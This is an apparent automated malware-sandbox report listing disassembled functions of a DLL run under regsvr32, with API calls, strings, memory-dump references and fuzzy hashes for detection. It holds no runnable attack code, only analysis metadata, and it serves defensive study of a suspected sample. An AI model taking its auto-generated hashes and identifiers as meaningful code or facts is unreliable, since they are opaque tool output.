                                                                      • Instruction ID: e5dfb64b9407e299139e97043c7b8f828a5eb8b5807e32c8bad1eb5c1a66464e
                                                                      • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                      • Instruction Fuzzy Hash: 5A31D220E8C243C6FAA86BA15D8227911D5DF67750F1CC535DA1E85ECEEFACF8907212
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A4CD4 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _getptd.LIBCMT ref: 00007FFA526A4CF3
                                                                        • Part of subcall function 00007FFA526A497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFA526A4D0E,?,?,?,?,?,00007FFA526A4EE3), ref: 00007FFA526A49A6
                                                                        • Part of subcall function 00007FFA526A309C: Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      • free.LIBCMT ref: 00007FFA526A4D7F
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • _lock.LIBCMT ref: 00007FFA526A4DB7
                                                                      • free.LIBCMT ref: 00007FFA526A4E67
                                                                      • free.LIBCMT ref: 00007FFA526A4E97
                                                                      • _errno.LIBCMT ref: 00007FFA526A4E9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lock
                                                                      • String ID:
                                                                      • API String ID: 1264244385-0
                                                                      • Opcode ID: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                      • Instruction ID: 8510db2b7bb20af7e6b550142651a2e3f2e23e06d7e17c69f133942bcf408fbc
                                                                      • Opcode Fuzzy Hash: 2d1c73193aff0bd2fa234daa6436aaac9807f819087f81d2c1bddea91d33e348
                                                                      • Instruction Fuzzy Hash: 21516D22908682C7E7549B65AC4027AB7E1FF86B54F18C236D69E43BDDCFBCE4419740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A6C34 Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 502529563-0
                                                                      • Opcode ID: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                      • Instruction ID: dadcd8328247e3e3a8e127ae78119ce8e993efb004e3758cee6edfdee842a9fc
                                                                      • Opcode Fuzzy Hash: d18ae8e3cce73ce1a52224a39a8d43e75eaf3a21478d7bf67846a2816eda3af9
                                                                      • Instruction Fuzzy Hash: D9110025A19642C5FE556B61AC1127926D1DF86B90F0CC230EA2E47FCEDFBCE450A711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A1EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateBoundaryDeleteDescriptorHeap
                                                                      • String ID: vb4vcW2kAW3Twaz?30
                                                                      • API String ID: 254689257-4179232793
                                                                      • Opcode ID: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                      • Instruction ID: 1bd5a091bcf8f322c5b05374612bff0bc4d00676a790642b1488eba387828f1b
                                                                      • Opcode Fuzzy Hash: 08b1cf252e4ad689d9d92df66199491e9f35c83da394e0c34af369396f0aa75a
                                                                      • Instruction Fuzzy Hash: 1D21F636A0CEC286E3218B14EC543A977E5FF89744F488535CACD87B69DFBDA5029B40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2FA0 Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A36F0: _initp_misc_winsig.LIBCMT ref: 00007FFA526A3729
                                                                        • Part of subcall function 00007FFA526A36F0: EncodePointer.KERNEL32(?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A3745
                                                                      • FlsAlloc.KERNEL32(?,?,?,00007FFA526A2179), ref: 00007FFA526A2FBB
                                                                        • Part of subcall function 00007FFA526A3108: Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFA526A2179), ref: 00007FFA526A2FEC
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFA526A3000
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _lock$AllocCurrentEncodePointerSleepThreadValue_initp_misc_winsig
                                                                      • String ID:
                                                                      • API String ID: 54287522-0
                                                                      • Opcode ID: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                      • Instruction ID: ff556a51c3374458c6c13c8b546d67d22c516b24c8612d8e346e8e2e4b77fc33
                                                                      • Opcode Fuzzy Hash: 926dbc3dc0f4bcdbbdac5bfac17ca3eb5364a16ed8e4c5d99003da15ed9a218c
                                                                      • Instruction Fuzzy Hash: EC014420E08583C1FB58AB759C0627462E1EF07724F0CC634D52D46EDDDFACA495A230
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A2050 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 566 7ffa526a2050-7ffa526a207f call 7ffa52661000 ExitProcess
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: JKvDDasqwOPvGXZdqW
                                                                      • API String ID: 621844428-4059861069
                                                                      • Opcode ID: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                      • Instruction ID: 60172eab89c5a4a9067c1c75ca3edb9fa1a5ab2538e6c52227e2557028c37a24
                                                                      • Opcode Fuzzy Hash: deed1fdb9085c7dcd35d809f3e44395f38d7cca76780fd27941661c68abd14ec
                                                                      • Instruction Fuzzy Hash: 48D09E25918A8181DA209B10EC1535A63E0FB8A345F844130D58C56B18DFBCD256C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A6CEC Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _errno.LIBCMT ref: 00007FFA526A6D0F
                                                                        • Part of subcall function 00007FFA526A66D8: DecodePointer.KERNEL32 ref: 00007FFA526A66FF
                                                                      • RtlAllocateHeap.NTDLL(?,?,?,?,00000000,00007FFA526A313B,?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF), ref: 00007FFA526A6D58
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateDecodeHeapPointer_errno
                                                                      • String ID:
                                                                      • API String ID: 15861996-0
                                                                      • Opcode ID: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                      • Instruction ID: ad83e10882b0ff5007c185d1c9918818adfebf0f576376ddca0e271bcc76e303
                                                                      • Opcode Fuzzy Hash: 39e9772f0cc65a7484b61a3e1fb2b868eaa6fa792f1398e078783a6d2fc3ba42
                                                                      • Instruction Fuzzy Hash: 5C119126B19242C6FF556B26EE1437962D1DF42BE4F1CCA34CA2D06ECCDFECA4409601
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A36F0 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _initp_misc_winsig.LIBCMT ref: 00007FFA526A3729
                                                                        • Part of subcall function 00007FFA526A755C: EncodePointer.KERNEL32(?,?,?,?,00007FFA526A373E,?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A7567
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A2FAB,?,?,?,00007FFA526A2179), ref: 00007FFA526A3745
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer$_initp_misc_winsig
                                                                      • String ID:
                                                                      • API String ID: 190222155-0
                                                                      • Opcode ID: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                      • Instruction ID: 1fa57a3cff05371287f8927d47ef5ab377ccf5e1f9d347b6bfd6bfb85a79e237
                                                                      • Opcode Fuzzy Hash: 29817383cbd5b8fc12b900dc218af1d2c44829c2a488d6b4e34f3447ba8c1d75
                                                                      • Instruction Fuzzy Hash: B4F0AC00E89247C0ED0AFB623C620BC12C18F97780F4CA070E81F0AB9BDFACE551A345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A4110 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CreateInformation
                                                                      • String ID:
                                                                      • API String ID: 1774340351-0
                                                                      • Opcode ID: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                      • Instruction ID: 88b8433c66fc9cbb0bc20c7d527ed21fa069b5985aebf0537326600d04497c1a
                                                                      • Opcode Fuzzy Hash: 489fa6aa26c4b222785c1fb3dc785f295b08bd9aa245ee8ef2e9349b67055af0
                                                                      • Instruction Fuzzy Hash: AFE04F75A2578183E7999B21AC0976562D0FB89340F849439EB4D02F98DF7CD0458A00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A73F4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFA526A34AF,?,?,?,00007FFA526A21CB), ref: 00007FFA526A740D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: EncodePointer
                                                                      • String ID:
                                                                      • API String ID: 2118026453-0
                                                                      • Opcode ID: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                      • Instruction ID: a8265c63cf0fb8e1b8af45ea68f186a90c40fa4596aacaf69da68519109f4c69
                                                                      • Opcode Fuzzy Hash: 0a2c1c774571843224449336236925bab63b88d9ce0b4f967ac09496dc1b8d3d
                                                                      • Instruction Fuzzy Hash: 62D01722F98A81C2EB518B21FD9026D22A4EB86B94F5CC031DA5C06A59DE6CC8968701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A3108 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(?,?,0000000A,00007FFA526A2DA3,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A314D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep_errno
                                                                      • String ID:
                                                                      • API String ID: 1068366078-0
                                                                      • Opcode ID: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                      • Instruction ID: 823619daea01bfe9bf01a0d97ef5b2da89ebad3f671e94fedfdbc496fc616eb7
                                                                      • Opcode Fuzzy Hash: 99b9e4cc6464749d47a71fc1b610823d805388b9272814145126b07a25ab941d
                                                                      • Instruction Fuzzy Hash: 1F016233A24B85C6EA599B169C40029B6E5FB89FD0F0D9131DE5D07F58DF78E851C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A309C Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00007FFA526A6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6C64
                                                                        • Part of subcall function 00007FFA526A6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3), ref: 00007FFA526A6C89
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CAD
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CB8
                                                                      • Sleep.KERNEL32(?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3,?,?,?,?,?,?,00000000,00007FFA526A2DC8), ref: 00007FFA526A30D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$AllocateHeapSleep
                                                                      • String ID:
                                                                      • API String ID: 4153772858-0
                                                                      • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                      • Instruction ID: 4dce94b8ec07f36d40a8e5c16b4f53bab19f27582b4d37f33beaba1228b09778
                                                                      • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                      • Instruction Fuzzy Hash: EEF0C832A097C5C2EA559F15AC4102DB2E0EB85B90F4C8134EA5D03F59DF7CE891C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 00007FFA526A895C Relevance: 24.4, APIs: 16, Instructions: 377COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1446610345-0
                                                                      • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                      • Instruction ID: c15588bf082ebfd4d2ac1b4a0eaddf7ebda5a706271b2f9b7adfba150f7f4b48
                                                                      • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                      • Instruction Fuzzy Hash: 33F1BE32A09681CAE7209F259C401A977E1FB46B98F188635EA5E47FDCDFBCE940D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A7BE8 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: DecodeErrorLastPointer_errno$AddressLibraryLoadProc
                                                                      • String ID: ADVAPI32.DLL$SystemFunction036
                                                                      • API String ID: 1558914745-1064046199
                                                                      • Opcode ID: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                      • Instruction ID: 0101bcaa71ad7b3ff6575ff3fab873f5f9c70abd6d3631981c59649deb0db526
                                                                      • Opcode Fuzzy Hash: a4bc4b26b88413057c65bce35d9d543f8071dd4b5a3168f49804b7622c4c0c09
                                                                      • Instruction Fuzzy Hash: B6316821A1D642CAFB51AB25AC1427D62D1EF86B80F1C8434EA0E47F9EDFBCE5459701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AC934 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                      • String ID: Norwegian-Nynorsk
                                                                      • API String ID: 2273835618-461349085
                                                                      • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                      • Instruction ID: 6e052157399510fd4cc4dab98077123e1a6c702bc27906d2b96b0927572d441a
                                                                      • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                      • Instruction Fuzzy Hash: A1614D63A09642C6FB649F259C6137927D0FB46B84F0CC136CA4E46AD9DFBCE940E305
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526AB5CC Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatTime$__ascii_stricmpfree
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 2252689280-3206640213
                                                                      • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                      • Instruction ID: 8e740dd8977669869c64ca0adee0f6f19256bf084884b0a285fb051e5aaed679
                                                                      • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                      • Instruction Fuzzy Hash: 41F1B222919692C9E7648F28985017C67E1FB27784F4CD132EB8E47E8DDFBDA854E301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FFA526A6F0C Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFA526A7194,?,?,?,?,00007FFA526A6C69,?,?,00000000,00007FFA526A30C0), ref: 00007FFA526A6FCF
